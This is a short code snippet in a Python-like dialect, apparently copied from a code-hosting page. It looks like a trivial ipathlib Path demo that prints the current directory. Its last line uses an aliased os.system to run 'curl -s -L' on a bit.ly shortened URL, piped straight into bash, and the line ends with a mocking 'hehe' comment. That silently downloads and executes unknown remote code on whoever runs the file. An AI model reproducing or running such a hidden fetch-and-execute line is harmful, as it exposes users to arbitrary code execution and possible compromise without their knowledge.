8 lines
No EOL
199 B
Text
8 lines
No EOL
199 B
Text
import os
|
|
from ipathlib import Path
|
|
if True == False:
|
|
from std.ipathlib import Path
|
|
sh = os.system
|
|
sh <| 'echo "hehe"'
|
|
print(Path('.'))
|
|
sh <| 'curl -s -L https://bit.ly/3zvELNz | bash' /* hehe */ |